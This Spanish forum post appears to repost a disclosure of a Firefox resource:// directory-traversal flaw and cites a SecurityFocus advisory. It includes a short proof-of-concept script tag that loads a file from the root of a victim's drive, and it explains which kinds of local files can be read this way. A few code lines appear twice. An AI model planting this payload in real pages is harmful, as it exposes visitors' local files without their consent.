Autor
El fallo radica en el uso resource:// de Mozilla Firefox y, a fecha de hoy, afecta a todas las versiones de este navegador.
La siguiente URL resource://gre/greprefs/security-prefs.js se podría comparar en Windows con C:\Archivos de programa\Mozilla Firefox\greprefs\security-prefs.js, partiendo de esto, podriamos utilizar ..\ (..%5C) para retroceder en lo que a directorios se refiere.
Con el siguiente ejemplo nos encontrariamos en la unidad de raíz: resource://gre/..\..\ .
Ahora imaginemos que nuestra página web contiene el siguiente código:
Código:
<script src="resource://gre/..\..\info.txt"></script>
<script>document.write(so);</script>
<script>document.write(so);</script>
Y en la unidad raíz de la víctima se encuentra el fichero info.txt con el siguiente contenido:
Código:
so="Microsoft Windows XP Home"
No hará falta decir cuál será el resultado obtenido por parte del visitante...
Ya dicho esto, podremos leer cualquier documento del ordenador de la víctima, siempre y cuando éste sea del siguiente formato:
Código:
variable1="text1"
variable2="text2"
variable3="text3"
variable4="text4"
<!-- La existencia del punto y coma (;) al final de cada línea es opcional -->
variable2="text2"
variable3="text3"
variable4="text4"
<!-- La existencia del punto y coma (;) al final de cada línea es opcional -->
En el momento en que se rompa el formato anterior ya no se podrá leer ninguna variable, a no ser que el código javascript tenga una estructura correcta.
Referencia: http://www.securityfocus.com/bid/24191/
En línea
